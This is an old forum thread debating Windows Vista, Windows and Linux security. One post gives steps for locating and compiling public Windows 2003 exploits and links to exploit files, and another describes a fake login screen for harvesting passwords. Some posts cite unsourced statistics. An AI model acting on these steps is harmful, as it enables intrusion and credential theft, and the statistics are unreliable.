And I still claim it’s not safe. There is no such things as safe techniques. Java RPC isn’t safe either. WinFX won’t be safe. I don’t doubt it will be safer than Windows RPC today, but it won’t be safe.
Seems to me we’re bypassing each other due to different definitions of “safe”.
Have you tried Ubuntu?
Granted, by default it installs with all ports closed from remote access. However, that still isn’t the same as having a firewall enabled during init.
Edited 2005-12-13 02:57
No, but it’s more efficient actually.
Only in the sense that it doesn’t have the “overhead” of an iptables ruleset to process. Stateful rules are generally very fast and non-solicited packets get dropped very quickly (assuming the default policy is DROP). Dropping a packet can be very efficient. Especially if you are being portscanned and the packets get dropped vice your stack having to send out a bunch of ICMP packets telling the distant end that the ports being tickled are closed. It also only is safe until the Administrator/root opens a port. At that point it is open to everyone.
Even assuming no ports are never opened, that TCP/IP stack must process every packet sent to the machine. That presents a couple of problems assuming there is no border router or firewall preventing it:
1) Someone probing for hosts will get some tactile feedback.
2) Some packets you might not want a TCP/IP stack to process in the first place (I have yet to verify if they have prevented that particular nastiness via sysctl, I’ll get back to you on that
.
This isn’t meant to be a cut on Ubuntu, I happen to like it a lot. Overall, the default configuration is very safe. It provides a very small attack vector while not limiting connectivity from the host to other hosts offering services. For Linux/networking newbies this reduces complexity considerably. They could still have the same effect with a stateful ruleset in place (and reduce the attack vector even more), but ease of use would be lost a bit when someone enables a service and then also has to figure out how to open ports in the firewall ruleset.
Personally, I feel that if a distribution doesn’t enable a stateful ruleset by default, they would do well to at least emulate what Ubuntu does out of the box.
I also forgot to mention Slackware in my earlier post. I really love that distribution, but I don’t consider it newbie safe (not that it pretends to be). All ports aren’t closed on the default install, nor is there a ruleset in place.
Edited 2005-12-13 04:09
Well, on my Gentoo system I started out with having all ports closed, then later adding a firewall to startup during boot, using rulesets for incoming and outgoing traffic – pretty much the same way I do it on Windows.
Personally I’d prefer if all linux distributions shipped with a firewall started on bootup. Even though they can be difficult to configure for some. Creating rulesets aren’t that easy for all.
The other option is to close all ports, which all distros I’ve used have done, when they weren’t shipped with a firewall.
To me it’s a bit difficult to say whether it’s a part of a distro or not, since I mess around with them so much, I can’t remember what changes I made, and what was shipped with the distro. Probably a brain damage from my LFS-time.
I would like to see those statistics. Any links?
I suspect you’d fine those links lead to their butt.
(“pulling numbers out of your arse”).
Making unbacked statements about one OS being easily compromised over another is no better than being a writer for Marie Clare or Cosmopoliton, with tips of “how to get your partner excited in bed”.
Have they taken into consideration that worms have unrestricted access on most Windows boxes because most people are running with admin-privileges?
That’s one thing Windows boxes have a problem with, once you compromise them, you get the whole box.
This isn’t necessarily true for *nix/BSD/Solaris solutions. You may be able to break it, but there maybe restrictions in place that limit the damage one can do.
Its not what Microsoft says with their PR machine or their trolls that hang out in forums and such…Its what it does. And so far, their security in an overall view, just plain sucks. Their solutions involve “band-aids” to problems. Not actual solutions.
Put it in this context, would you bet your life on a Microsoft solution? If MS developed a jet engine and a digital flight control system, would you sit in that plane?
If you think that way, then you can easily be immune to the PR coming out of Microsoft.
If you do some serious digging, you’d see even Microsoft use Solaris and FreeBSD in some of their critical infrastructure. So what does that say of how trusting is MS of their own products?
(If Windows is really that great, wouldn’t the company be using its products for its entire network? How come people just accept what they’re given? How come they can’t be sold a good SOLID product?)
Microsoft needs to make Vista sell. So they’re pulling out all the stops. Its really unfortunate that in this day and age a company like Microsoft can now rely on so -called “tech journalists” to do their advertising for them. About 90% of people will believe them without questioning anything. The other 10% sit back, laugh, and point out the BS being advertised.
(This is no different from Terrorists using Al-Jazzea news services to get their message across).
Not to mention the fact that the US Govt helps them…Think I’m kidding? I’m amazed that MS has connections so high up in the US, that they can request another country conducting an anti-trust case against them to “back off”. (US Govt telling South Korea to lay off Microsoft…As if that doesn’t raise curiosity!)
Anyway, the point I’m trying to make is…Don’t believe anything Microsoft says, especially in the security department. You don’t know what they’ve done under there, that could warrant such PR statements.
Use the “I believe it, when I can see it” approach.
They can say whatever they want, if they don’t deliver, well, that becomes a story.
So at this time, just act like their talking to a brick wall.
If MS developed a jet engine and a digital flight control system, would you sit in that plane?
Nooooo… I’m too young to die. I prefer my own gentoo-based plane. And the good part is: It can even read and write the MS plane systems, so it can communicate with them – without being compromised
[read: captive-ntfs :p ]
I never believe Microsoft just like that. One has to pick their sentences apart, read between the lines, and compare their statements with earlier statements and earlier behaviour.
I would agree that linux is more popular os which is cracked for root/administrator rights simply cause there millions of windows boxes that simply do not need craking cause dumb Joe Users all run them with admin rights.
But when it comes to downright hacking: ie: gaining root / administrator privileges on a box, Linux is cracked more often than Windows.
There’s one word that’s just about right in there – crack.
Not at all. Windows is certainly subject to more annoying worms and such that launch DOS attacks and that kind of thing. But when it comes to downright hacking: ie: gaining root / administrator privileges on a box, Linux is cracked more often than Windows.
Ah…because it doesn’t require any ‘leet skills’ to break into a Windows machine?
Why try and make a whore out of a smart prude, if there are plenty of dumb ones around to play with already?
Seriously, do you want to play a game of symantecs, or are you really that out of touch?
Re: “And given that statistically, Linux is the most cracked into operating system in the world, I would NOT bank on Linux being secure in any sense of the word.”
It’s really not that difficult to find detailed reference material by doing a simple Google search which can help educate the misinformed, misguided and those that typically attempt to spread FUD. I’ve included a few such links.
http://www.theregister.co.uk/security/security_report_windows_vs_li…
http://os.newsforge.com/os/04/05/18/1715247.shtml
Anyone who considers The Register a legitimate source of information also needs to get a clue. It’s a joke.
Great sources. An open-source/linux site and a newspaper that runs sensationalist headlines and is often critical of Microsoft. Regardless, theregister’s page is at least worth looking at, and coming to your own conclusion at least.
I don’t even know that it is worth lookin at. I work in the IT news business. And for the most part, we consider TheRegister to be a tabloid press that is rarely to be taken seriously.
Right. Only read it knowing theregister’s history and with a mind that isnt influenced so easily by words.
And given that statistically, Linux is the most cracked into operating system in the world, I would NOT bank on Linux being secure in any sense of the word…
Ok, so let me get this straight: You’re comparing an O/S that needs 3rd party software so that it doesn’t get cracked by automated scripts written by bored teenagers against an O/S routinely used in a highly secure fashion by the likes of Google and various fortune 500. (Including numerous stock exchanges!)
A virus is an automated “crack”. Linux has its share of cracks, but
1) They almost never automated, and
2) They are usually pretty easily defended against, without requiring stupid bandaids like antivirus/antispyware.
So, next time your Norton A/V complains about a virus, relax, and know that you’ve been cracked! Again…
Proof that, once again, idiocy knows no limits.
Maybe if they said the will put it forward for Common Criteria evaluation at EAL4 against protection profiles that are used for other systems (eg Solaris and RedHat Linux) it would help make this more believable – since it is very hard to influence an CC evaluation (and it costs serious money). At least CAPP and RBACPP but maybe also something like LSPP for the domain isolation features.
They are touting the security of IPSec in the article and comparing it to Kerberos. So perhaps MS is going to deliberately break the IPSec protocol, adding fields so that the only computers that can use it to comunicate with Windows computers are windows computers. Like they did with Kerberos
This post should be mod’d up.
…they sang the same tune for Windows 98… and NT4 and so on.
And so far their OS has failed miserably in regard to their promises. Which is to expect from a company trying to make money. Ads/Commercials are never true
If people use their brain they won’t get in trouble with Vista, perhaps apart from using existing software and hardware.
But there is still a while before Vista is released, and many things can happen in that long time.
why oh why is microsoft wasting its time? vista will be the beginning of the end of MS. it will take a long time for MS to die, but die it will.
First of all Microsoft messed the W3C html specs. Now they are systematically going after XML and Finally whats
left is the TCP/IP stacks. End result is big Network mess. I know Microsoft zealot dont worry much they are already slaves of the giant.
Is that tinfoil hat nice and comfy? 🙂
i bet its nowhere near as comfy as that conical shaped hat with the letter D written on that you wear all the time.
I only wear it to blend in here.
You wear what?
Poo?
Figures.
Linux Is Poo!
Again, not the flame wars!!!!
If your check out the channel9 videos…I doubt Vista is going to be as bad as people are making it seem. There are quite some nice innovations under the hood…most of them of course from lessons learned from the better OSes out there like the *nix flavors that come to mind. Stuff like not being an admin privilege holder and the restart manager are directly taken from the *Nix flavor OSes. If MS can take the good of other OSes and package it with what people are familiar with in XP and add new features as they are with the XPS printing system, brand new color space for working with RAW for starters, I think they can pull this off. Either way it will be interesting to watch to say the least. The thing is MS has good ideas and they can develop good products like the 64 bit XP, Windows 2003 Server, MS Office…its just some things that they do are rather appalling like….SECURITY! Dont you guys think that all the bad rep that MS has stems from the fact that its products are riddled with security holes?
I am not taking about security. Something that is an on going battle with Microsoft. I know these security loop holes will never go off Microsoft because of vast user base. My main concern is why Microsoft plays with specification like HTML/XML and TCP/IP. They dont have the rights to modify and monopolies them. Specification should be adopted not monopolies illegally. These should be the concern for each and every industry that is not microsoft.
Ah, here is a linguistic misunderstanding, it appears. Microsoft isn’t changing the specifications, technically: it’s interpreting them in a way to their liking, and is slanging them (this use of “slanging” may be my personal slang
) and adding new meaning to them, much in the same way Eubonics is not a fully documented and approved “language” but more of a slang dialect that’s quite unofficial, regardless of the insanity of the California school system… The English language is still English, but it has many different dialects that are still called “English” which have slightly different rules. This is what Microsoft is doing, like it or not: they aren’t rewriting the specifications, but rather reinterpreting the specifications, and those that wish to play with them in their group may also need to learn the slang, just like any social group. Everyone else is free to go along and speak “proper English” (whatever that really means, based on discussion above) but if they refuse to acknowledge someone speaking a slanged version of it as being legitimate, they risk being isolated as language purist snobs, much like some actual countries/cultures resist the changing of their language from outside influences. For better and worse, languages change over time, and it comes down to changing interpretations causing the biggest changes that cause incompatibilities.
If you doubt this, look at most long-existing programming languages, such as C, C++, BASIC, and even some of the more modern ones, like Python, Java, Ruby, Perl, etc. and do some cyberarcheology to see how the languages have grown and mutated in syntax and semantics over time.
Jonathan Thompson
Yes I have to agree with you Anon…it is rather difficult for developers to build correct appearing software when MS is playing god with the standards. They are standards and hence by definition should be followed. I can understand the HTML stuff but when it comes to XML are you talking about XAML? If so that is entirely an internal usage of XML for applications based on Avalon. If that is not what you are talking about then please she some light. Also I dont know what you are talking about when it comes to TCP/IP. Is it the all new stack in Vista?
No, I think it’s more liekly because their products have a reputation of being second-rate shit flogged at inflated prices to unassuming consumers and managers with the mental capacity of fleas, then shoved down the throats of the masses as “advanced, easy-to-use” and every other adjective that describes exactly what the software ISN’T.
> No, I think it’s more liekly because their
> products have a reputation of being second-rate
> shit.
Uh huh… Now let me tell you the reality. The reality is that some of the most brilliant computer scientists in the world are working at Microsoft. The reality is that only about the top 1% of computer sciences graduates will even get an interview as a developer at Microsoft, and probably 1% of those will actually be offered a job. The reality is that Microsoft’s pre employment skills tests are some of the toughest and most demanding in the industry. The reality is that I seriously doubt you are smart enough to get a job at Microsoft. Sorry, but I have a problem with people calling other people’s work “shit” when the reality is that they almost certainly aren’t nearly as skilled, or brilliant as the people who did that work, and probably couldn’t even come close to doing as good of a job as they did.
I will have to disagree. If you go around and interview most people, you will see that they are angry at MS because of the security bugs that are so prevalent in their software. That is the problem. You surely cannot convince people that MS software does not work right out of the box or it does not make life easier for the user. I think one of the strongest selling points of MS is that they can make software very easy to use for the layman. They are very good at packaging and marketing. Now if only they were that good when it came to security.
By the way, I bet not one of you who says that it is easy to gain admin access on a Windows box could actually do it. I bet not a single one of you could gain admin privileges remotely on a default out of the box Windows 2003 server install.
I bet you don’t use Windows 2003 Server for surfing.
But, it is comforting to know that if you offer Microsoft some several thousand dollars, they will offer you an operating system that probably cannot be cracked by one out of 10 random OSNews posters. That’s *real* security.
By the way, some of us don’t use Linux. Despite what you have been told, there are other operating system families than Linux, Windows and Mac.
> they will offer you an operating system that
> probably cannot be cracked by one out of 10
> random OSNews posters. That’s *real* security.
That’s not really my point. My point is that I find it amusing that of all the people who claim that it is “so easy to get admin access on a Windows box, that most people wouldn’t believe it.” that I bet not one of them could actually put their money where their mouth is if they were sat down and asked to gain admin privileges on a Windows 2003 box. I bet not a single one of them could do it. Well, why can’t they if they claim it is so easy?
Well, why can’t they if they claim it is so easy?
Put up some sort of bet and put up a box to be cracked if you’re so confident. Until then you are speculating the opposite of what you find objectionable and expecting it to be taken as fact. That, as the Monty Python team said, is not argument but simple contradiction.
> Put up some sort of bet and put up a box to be
> cracked if you’re so confident.
Microsoft actually did this as part of their Windows 2000 Server lead up. They put up a box and challenged all comers to try to crack it. Guess what? Not one person succeeded in cracking it. The only time it was brought down was by a DDOS attack using subserver7 or something along those lines. And that’s not fair because any box, no matter how secure, is vulnerable to brute force DDOS attacks.
I think your statement is misleading – the server was locked down by a team of experts – this is not behaviour out of the box.
For example, are you trying to say that the infamous IIS and MS Access exploit did not exist in Windows 2000? One of my co-workers, way back then, found that one of the largest banks in Canada was easily broken into using this exploit.
> For example, are you trying to say that the
> infamous IIS and MS Access exploit did not exist
> in Windows 2000?
Do you want to look at how many exploits there have been in sendmail, routed, and bind? I suspect you do not. All three have been plagued by serious security problems in the past. OpenSSH has also had its share of serious vulnerabilities.
>>> Microsoft actually did this as part of their Windows
>>> 2000 Server lead up. They put up a box and challenged
>>> all comers to try to crack it. Guess what? Not one
>>> person succeeded in cracking it. The only time it was
>>> brought down was by a DDOS attack using subserver7 or
>>> something along those lines. And that’s not fair
>>> because any box, no matter how secure, is vulnerable
>>> to brute force DDOS attacks.
>> For example, are you trying to say that the
>> infamous IIS and MS Access exploit did not exist
>> in Windows 2000?
> Do you want to look at how many exploits there have
> been in sendmail, routed, and bind? I suspect you do
> not. All three have been plagued by serious security
> problems in the past. OpenSSH has also had its share
> of serious vulnerabilities.
Sure, I would, but that has nothing to do with the context of this discussion. The original post implied that Windows 2000 was undefeated, and the response was that is was. The next response said, “oh yeah, well, your momma wears army boots!” Try to keep in context of the discussion thread.
Btw, I’m not saying they are completely uncrackable. I’m saying that 99% of the people who spout off the rheotric they have heard that they are so easy to crack, would not actually be capable of cracking one themselves. After all, usually the people who feel the need to make statements like that are the zealots who in reality, have marginal technical skills and are typically wannabe hackers.
It is easy to get admin access to any Windows box you sit down in front of. All you need is a Windows CD and Passware on a floppy.
> It is easy to get admin access to any Windows box
> you sit down in front of. All you need is a Windows
> CD and Passware on a floppy.
And as I already pointed out, it’s even easier on Linux, where all I need is a bootable external device, which after booting, I can mount the root filesystem on the hard disk to a mount point on my bootable device. Instant root access.
As was pointed out, this is not an OS specific problem. And it is a problem that is solved by setting the BIOS password and not allowing booting from external devices or floppies. Even that is not 100% secure since someone could reset the BIOS. But that would require fairly noticable activities, like taking the cover off and digging around inside.
How much you wanna bet? /grinz/
Now it’s IPSEC.
They want anyone to believe it’s a MS thing.
Linux users dance with glee at Windows security but
Ubuntu Linux has no firewall installed…
On the assumption that it doesnt need one.
This is coming in Dapper Drake. Along with the fancy liveCD gui installer, “ubuntu express”, GST 0.10, and so on.
https://launchpad.net/distros/ubuntu/+spec/firewall
Your link says Priority Medium- and that it’ll be unlikely to make it into Ubuntu 6.04, maybe 6.10.
To me, this looks like proof that the Ubuntu devs don’t consider a default firewall terribly important.
It could be rooted in 30 minutes, if a hacker took shots at it.
What that same study also showed was that the average WinXP box was infected before its installation was complete (7 minutes).
The difference being that the RH box was being specifically targeted and hacked upon. The WinXP machine was getting compromised by worms on the same network.
Not the same thing.
http://www.theregister.co.uk/security/security_report_windows_vs_li…
CERT considers any vulnerability with a score of 40 or higher to be serious enough to be a candidate for a special CERT Advisory and US-CERT technical alert.
We queried the CERT database using the search terms “Microsoft”, “Red Hat”, and “Linux”. [9] While the CERT web search capabilities do not produce perfectly desirable results in terms of granularity or longevity. This is especially true for the search results for “Red Hat” and “Linux”. The “Linux” search results include a number of Oracle security vulnerabilities that are common to Linux, UNIX, and Windows. The details of the most severe “Red Hat” entry does not even list Red Hat as a vulnerable system. The results for the “Microsoft” search seem to be almost entirely accurate, inasmuch as both the details and entries refer to flaws in Microsoft-specific software. As a result, the results are somewhat unfairly skewed against Linux and Red Hat. Nevertheless, even if one takes the results at face value and ignores the skewed results for Linux and Red Hat, Microsoft still produces the most entries in the CERT database, and the list of entries contain the most severe flaws.
——————————————————
An interesting commentary of these pro-Windows studies
http://www.newsforge.com/article.pl?sid=04/07/06/1812203
Red Hat: After spending considerable time studying many of the alerts listed for Red Hat Enterprise AS3, I only found one vulnerability that, with any certainty, could allow an unprivileged remote user to seize control of a system with administrator privileges.
Windows: In sharp contrast, it was obvious that several of the security alerts for Windows 2003 Enterprise Edition showed unprivileged remote users can seize complete control of the Windows server with full administrator privileges. I quote from just three the Microsoft alerts themselves as examples (emphasis mine):
1. A vulnerability for anyone viewing images over the Internet: “This is a buffer overrun vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges.”
2. All programs that use SSL (Web servers, etc.): “A buffer overrun vulnerability exists in the Private Communications Transport (PCT) protocol, which is part of the Microsoft Secure Sockets Layer (SSL) library. Only systems that have SSL enabled, and in some cases Windows 2000 domain controllers, are vulnerable. An attacker who successfully exploited this vulnerability could take complete control of an affected system.”
3. A vulnerability in NetMeeting and other programs using H.323 protocol: “A remote code execution vulnerability exists in the way the Microsoft H.323 protocol implementation handles malformed requests. An attacker who successfully exploited this vulnerability could take complete control of an affected system.”
——————————————————-
Let me close up by saying that most of the FOSS projects have no ulterior motive in hiding bugs or undermining their importance. Zeus knows how many critical bugs the Microsoft people have found internally that we don’t know of.
And of course, if everything fails, you can always virtualize unsafe web services and whatnot. And that area, FOSS wins hands-down, as far as the variety, amplitude and quality of it virtualization (vservers, VmWare, etc. At the very least you have choices which cost $0 ).
I can play that game too.
A quick search of Secunia’s database reveals 2,013 vulunerability reports containing the word “Red Hat”, 4,159 containing the word “Linux”, but only 594 containing the word “Windows”
one of the things that bug me, about when non windows people complain about windows. is: they are usally talking about older version of windows and comparing them to new versions of nix based OS’s. which is not fair.
or: the people complianing the most know very little of windows security, and are just spewing off at the mouth. what they have heard other idiots say.
if your going to compare an OS to an OS in security terms . u compare the ‘raw’ OS not all the apps that are bundled with it…
so saying IE exploits are bad for server installs? how so? who uses IE on servers?
so IE exploits on servers are very low risk, sure they still get patched but they are low risk becuase…
they are servers…
and windows security is changing. and for the better every version gets better, sure there are still issues but guess what, most have to deal with legacy stuff and
compatibility.
i mean sheesh, windows has to have a lot of compatibility, and linux camp really doesn’t have this issue. as: they don’t have alot of compatibility now.
-Nex6
-nex6.blogspot.com
Edited 2005-12-12 20:53
So if vista turns out to be secure enough that the average user has much less spyware, adware, slowdowns, etc., then it could become an even better seller than xp.
Vista will be very popular if you can tell the average user that they don’t have to worry about viruses and worms, but I don’t think that’s going to happen. It’ll take microsoft another OS to do that.
This must be a joke… and an old on too, I’m hearing this for more than a decade! You wan’t security? Try a Unix ou Unix-related OS (Mac OS X, Linux, etc.)
there are alot of major improvements, like with IE7:
its basicly runs in 2 modes a ‘protected mode’ and an ‘admin mode”
proteced mode is basicly read only, and runs in a sandbox, light years beyond ie6 in terms of security..
that alone, is worth it. and that technolohy is built in and other apps can use it.
-nex6
But is it still integrated into the OS as IE 6 is in XP?
A study was make some month ago.
70% of the attack against any linux system were a success.
24% in the case of XP
5% in the case of MacOS & freeBSD
Linux is a lot more vulnerable.
please dig out the URL?
Steps to exploit windows 2003…
1.) Go to http://www.secunia.com and search for windows 2003
2.) Start browsing through the exploits and copy the CAN numbers
3.) Go to http://www.packetstormsecurity.com and search for those CAN numbers
4.) Find working exploit code
5.) Compile it on your ‘nix hacking workstation and attack the windows machine
6.) Profit!
Don’t believe me? Take a look at this working exploit code I came up with in a few minutes.
http://packetstormsecurity.org/0504-exploits/MSHTA_POC.c
http://packetstormsecurity.org/0508-exploits/HOD-ms05039-pnp-expl.c
http://packetstormsecurity.org/0505-exploits/SSExploit.c
http://packetstormsecurity.org/0410-advisories/CORE-2004-0802.txt
http://packetstormsecurity.org/0410-exploits/HOD-ms04032-emf-expl2…. xp exploit that works on 2003
http://packetstormsecurity.org/0510-advisories/EEYEB-20050915.txt
yes, it is in a way: but it vista has new secruity framework, sort like a lesser role based security.
to run apps in a sandbox, very slick stuff…
-nex6
and i wonder what proven secure system microsoft stole that idea from *cough*nix*cough*
the entire IT sector copys from each other, and mainframes, and other trusted OS’s have had MAC/rolebased security for longtime, and not like its a patented idea. its just evolution.
Well, if i have local acces to Windows i can mimick windows login with a program that catches ctrl+alt+del and presents the user a fake login screen. I don’t have to logout of my account, just run the program, like you do with you linux account without logging off.
No you can’t. Because you cannot trap Ctrl-Alt-Delete as a non-admin user and have it do what you want it to do. Try it. It won’t work.
The code I show for Linux will work when run as any user. It doesn’t have to be run as root.
those same steps could be used for any OS, ALL OS are hackable.
-nex6
Remember that today Linux PC use some kind of graphical login manager, not the just plain login: password:
How could you write a login manager that really mimics gdm/kdm? And what would you get from that? just other users and passwords, useless because you already have access to the system. But you couldn’t trick a root admin!
> How could you write a login manager that really
> mimics gdm/kdm?
Basically, the same way. Only difference is that it would require you to load a program that presents a full screen fake login prompt that mimics the gdm / kdm screen. It would require more code, and knowledge of Gtk / Qt programming. But the general idea is the same.
What this all boils down to is the problem that Linux / Unix does not restart the login manager immediately before you login like Windows does when you do Ctrl-Alt-Del. If it did, none of this would be possible to do without having root privileges in advance.
> But you couldn’t trick a root admin!
Sure you could. Why not? The prompt looks identical. In X, it should be possible to foil it by doing the Ctrl-Alt-Backspace combination to kill and restart X before the login. But most users won’t do that. And none of the gui login managers for Linux enforce it.
Well, what about if it just presents the user login screen without asking you for Ctrl+alt+del. Most users don’t care about that or know about security.
“What this all boils down to is the problem that Linux / Unix does not restart the login manager immediately before you login like Windows does when you do Ctrl-Alt-Del. If it did, none of this would be possible to do without having root privileges in advance. ”
It restarts after you log out. But I could Ctrl+alt+del and if there’s a user logged in it will present the logout screen. So I can really say I know there’s someone logged in. Also a unix admin won’t ever use a public access PC as root, not even his own PC, unless he’s plain stupid.
> It restarts after you log out. But I could
> Ctrl+alt+del and if there’s a user logged in it
> will present the logout screen.
But it needs to be restarted before you login. Not before you log out. Because this is all based on the fact that a malicious user doesn’t log out, and instead starts a program that spoofs the login and fools the next person who comes along into thinking it is the real login.
> Also a unix admin won’t ever use a public access PC
> as root, not even his own PC, unless he’s plain
> stupid.
He doesn’t have to. If he is fooled by the fake login and logs in as a normal user, the program that spoofed the login manager can from that point on, log every thing he does–including logging passwords if he uses sudo or su.
Main difference is in Windows lot of programs don’t work if you don’t use an admin account. In unix/linux you certainly don’t need advanced privileges.
> Main difference is in Windows lot of programs
> don’t work if you don’t use an admin account.
> In unix/linux you certainly don’t need
> advanced privileges.
Typically, the same kinds of programs that need admin rights on Windows, also need admin rights on Linux. And usually the “user land” programs on Windows that do need admin rights only need admin rights to install them. After that they can be run as normal users.
You could use “Run As…” on apps that need admin privileges.
Perhaps you don’t know how unix security and mail protocols work, but you can’t execute a mail attachment in linux because attachments don’t carry the execute bit permission. You need to save it to disk and manually set execute on. You are totally aware of this. But in Windows it’s not like this, or is it? No. You can execute any program provided it has the right extension. Just stupid old-DOG behavior.
> Perhaps you don’t know how unix security and
> mail protocols work, but you can’t execute a
> mail attachment in linux because attachments
> don’t carry the execute bit permission.
So I tar it, and tell the user to untar it and run the script inside of it, which will have maintained it’s executable bit if I set it before I tarred the file. Same deal. We are banking on the fact here that the user is gullible enough to run something they are told to run. Whether they have to do something additional besides just click on it is not really an issue.
You don’t follow. It restarts before you login. What’s missing is just the Ctrl+alt+del to ensure there’s no program faking the login. But I can ctrl+alt+del in an open session in KDE and I will get the logout screen, signal that I’m already logged in.
> But I can ctrl+alt+del in an open session in KDE and
> I will get the logout screen, signal that I’m
> already logged in.
Sure. You can. But I bet you never did before this discussion :p And I bet 99% of users out there don’t either.
Oh… and depending on how the system is configured (and by default) this will most likely issue a reboot command if you are not in KDE and are actually at the KDM prompt… That’s obviously less than desirable behavior, and would require some customizing to stop it from happening. Most Linux distros trap Ctrl-Alt-Del by default and send a reboot command.
Yes, but you have to tell the user to do that. With OE and Outlook that was (will, is, who knows now) not necessary. Viruses and worms autoexecute themselves without telling the user: “Hey, untar this file and execute this script”.
Same thing is possible in something like pine which most likely has over 1,000 as of yet undiscovered buffer overflow exploits that would allow someone to push arbitrary executable code onto the stack by just sending a bad email header. No attachment even required. If you are running Pine as root when that happens, the code will run as root as well.
I didn’t. I don’t share my PC, luckily. You have a point here.
ctrl+alt+del on kdm does nothing. It works on console, as configure in inittab, but you have to login on console. If we are talking about graphical login managers, in kdm, at least, don’t know about gdm or xdm (but shouldn’t matter because X doesn’t trap ctrl+alt+del by default), won’t issue a reboot.
You just have changed the topic, now talking about buffer overflows. Windows and all windows applications have plenty of them. So don’t start a discussion here because there are more known critical unpatched vulnerabilities in Windows, and you are not certainly in a good position
Plus, running pine or mutt or put your favourite *x mail client here as root is stupid. I’m not even talking about running OE as admin or injecting malicious code into IIS or IE with it’s ActiveX wonderful spyware extensions.
Edited 2005-12-12 22:54
I haven’t really changed the topic. Just made a point that you don’t necessarily have to knowingly execute something on Linux to have arbitrary code executed.
The point I was making is basically this: If you have dumb users running with root privileges or admin privileges, the probability of bad shit happening is 100% no matter what OS they are running on. And we can safely assume that the Linux user running everything as root is at least as clueless as the average Windows user, if not more so, since the hazards of running as root are so well known.
lol
Yeah, but I can assure you there are more Windows users (clueless) running as admin than the equivalent users running Linux as root. (clueless too). That’s because the system enforces security. With Windows, it just won’t work. Not until Vista. Prove I’m wrong. If I’am, Vista’s sudo will be useless because it won’t need it. But I know i’m right.
Oh I’m sure there are more clueless Windows users running as admin. I’m just suggesting that the typical Linux user running as root would likely be even more clueless than the typical WIndows user running as admin. Because said Linux user would pretty much have to ignore the warnings that typical installers provide about how dangerous it is to run as root.
“Same thing is possible in something like pine which most likely has over 1,000 as of yet undiscovered buffer overflow exploits…”
Well, how can you say undiscovered? I can say the same about windows, but I can say billions of buffer overflow exploits not yet discovered. You know, Windows has a good track record. Sorry.
> Well, how can you say undiscovered? I can say the
> same about windows, but I can say billions of
> buffer overflow exploits not yet discovered.
> You know, Windows has a good track record. Sorry.
These are problems in applications. Not the OS itself. They are problems inherant in languages like C and C++ that don’t do things like array bounds checking, or check the size of string buffers to see if they are big enough to hold whatever you are trying to shove in there. They will happily just write past the end of an array or buffer if what you try to shove in them won’t fit. In otherwords, these problems are the results of mistakes programmers make.
I chose the pine example because pine is an application that is regarded by security experts as being horribly programmed and being subject to tons of security exploits involving buffer overflows.
I don’t want to speculate on whether Windows or Linux has more problems here since these are not OS problems, but application problems. Of course, the amount of damage they can potentially do is amplified when running as root or as admin.
do you work for microsoft? thats the only reason why you should be attempting to defend the indefensible.
> do you work for microsoft? thats the only reason
> why you should be attempting to defend
> the indefensible.
No, I don’t work for Microsoft. I just don’t like it when people make blanket statements in either direction. And that’s what I originally responded to was the blanket statement that Windows is insecure. The original person who said that was only parroting back what they have heard. I also don’t like it when people make blanket statements like “It’s really easy to crack into”, and yet if they were give the opportunity, wouldn’t actually be able to crack into it. Again, all they are are doing is parroting what they have heard. They don’t even know why they are saying it is easy to crack into, other than “This is what i have heard, so it must be true.”
That’s the kind of thing I can’t stand.
Well, he has a fair knowledge of linux and his main topic remains somewhat true. If it’s really needed a cltr+alt+del to login I just don’t know. 20+ years of unix show unix designers really knew how to do OS security. Couldn’t say the same for Microsoft.
> 20+ years of unix show unix designers really knew
> how to do OS security. Couldn’t say the same
> for Microsoft.
Well, not really. After all, lets not forget that early versions of Linux (and most versions of Unix) had no concept of shadow passwords. Passwords were stored using DES encryption (easily cracked) in a world readable file. Also, lets not forget that maximum password length in DES encrypted passwords was only 8 characters. And even after Linux / Unix did start supporting shadow passwords, it was quite some time before they could be used reliably because many programs that needed access to password information didn’t support them.
Unix has had more than its share of “This is blatently insecure” issues throughout its 20+ year history.
And how could that linux user run as root in a decent linux distribution that doesn’t allow root login, as ubuntu?
Ubuntu is the only distro I know of that has the root account totally disabled by default. Maybe I am wrong, but I don’t think most other distros do that. At least none of the other ones I have installed do. They all enable the root account on install, but they also all do warn you about the dangers of using it for every day use and prompt you to create a normal user account.
It’s not completely disabled. It’s there, the password is just set to something random during the install. You can change that with a simple “sudo passwd root” as the user created during the install.
“I chose the pine example because pine is an application that is regarded by security experts as being horribly programmed and being subject to tons of security exploits involving buffer overflows.”
I can choose OE ir IE, both vital applications in any Windows config. And that proves the same point, the main difference is you are probably executing you windows application with an admin account. In Linux that’s not really common.
> I can choose OE ir IE, both vital applications in
> any Windows config. And that proves the same point,
> the main difference is you are probably executing
> you windows application with an admin account.
True. It’s an issue that is easily solved in Windows. The weakness is that Microsoft has never warned users about the dangers of running as the administrator, and has never prompted users during the setup to create an account for every day use that does not have admin privileges like most Linux installs do. That’s something Microsoft should change.
True, but that was more a lack of common sense given that by that time, DES was enough for available computing power. What would happend when computers get so powerful that are able to crack a MD5 password in a sec? Of course shadowing helps a lot and toke time to make it default.
All OS had and have yet desing flaws. But the problem with Windows is that it’s inherently flawed by design. And chaging that is difficult because they have to protect their user base, a matter of business and backwards compatibility. I don’t think they will ever been able to change the OS base. Just a couple of tweaks to UI. No more than that unless they want to break all applications.
> DES was enough for available computing power.
> What would happend when computers get so powerful
> that are able to crack a MD5 password in a sec?
> Of course shadowing helps a lot and toke time to
> make it default.
Well, the design flaw was not so much in using DES encryption as it was in requiring the passwords to be world readable. If they had used shadow passwords originally, how well they were encrypted would not have been an issue since you could only read them if you had root access. (And with shadow passwords, we can pretty much assume that encryption is largely irrelavent since if someone is able to read /etc/shadow, you’ve probably already been rooted).
Limitting passwords to only 8 characters was also somewhat of a design flaw. I realize back then saving every bit of memory you could was important. But still.
Yeah, well, that’s pretty much distro specific. End user oriented distros like Ubuntu have root disabled. I re enabled mine because I know what i’m doing, even if most of the time I just sudo, and I know that’s the preferred behavior.
And they will with Vista. That’s the problem with Microsoft: they made users stupid clueless uneducated about their PC. They don’t need to know about permissions or the boot process. Just make them concious about security. But there are a lot of problems left. File identification by using extensions is a stupid decision. File cookies as in mime types or used by ‘file’ are really better. They should change that, but that surely will break a lot of applications relying on file extensions. Another problem that expands to all Windows developers. Clueness.
Correct me if i’m wrong, but remote clients use another X instance, like :1
So killing the current X instance doesn’t affect remote clients.
